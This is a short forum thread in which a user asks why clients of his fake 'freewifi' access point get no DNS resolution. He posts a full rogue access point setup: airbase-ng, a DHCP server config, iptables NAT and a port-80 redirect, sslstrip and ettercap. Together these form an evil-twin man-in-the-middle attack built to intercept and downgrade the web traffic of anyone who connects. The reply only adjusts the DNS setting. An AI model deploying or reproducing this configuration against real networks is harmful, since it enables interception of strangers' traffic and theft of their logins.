Results 1 to 2 of 2

Thread: fake access point clients can not access internet

  1. 2016-03-25 #1
    --JayJay--
    --JayJay-- is offline Junior Member
    Join Date
    2016-Mar
    Posts
    2

    fake access point clients lacking dns

    With my setup pictured in the attachment there's an issue with the fake wireless acccess point clients using dns.
    DNS is routed to the gateway address 192.168.1.1 according to this rule which routes UDP traffic to 192.168.1.1:

    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

    Is this 192.168.1.1 supposed to be a DNS server/proxy of some sort?
    DNS traffic from the wireless cllienst in this setup seems to finish at this point.
    In my setup 192.168.1.1 is default gateway/forwarder but not a DNS proxy or router.



    Here's the configuration:

    ############# DHCP INSTALL ##############
    apt-get install isc-dhcp-server

    ####### EDIT /etc/dhcpd.conf #####################
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.0 netmask 255.255.255.0 {
    option routers 192.168.2.1;
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option domain-name-servers 192.168.1.1;
    range 192.168.2.111 192.168.2.119;
    }

    ############# AIRMON-NG ############
    airmon-ng
    airmon-ng start wlan0
    airbase-ng -c 11 -e freewifi wlan0mon

    ############# AT0 AND IPTABLES #############
    ifconfig at0 192.168.2.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    #################SSLSTRIP####################
    sslstrip -f -k -p 10000

    ################# ETTERCAP ##############
    ettercap -p -u -T -q -i at0


    kalipi.jpg
    Last edited by --JayJay--; 2016-03-25 at 13:45.
  2. 2016-03-25 #2
    --JayJay--
    --JayJay-- is offline Junior Member
    Join Date
    2016-Mar
    Posts
    2
    When changing ...

    option domain-name-servers 192.168.1.1;
    to
    option domain-name-servers 8.8.8.8;

    in the DHCP setup the result is the same, as the next line in Iptables is pointing all UDP traffic to 192.168.1.1

    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules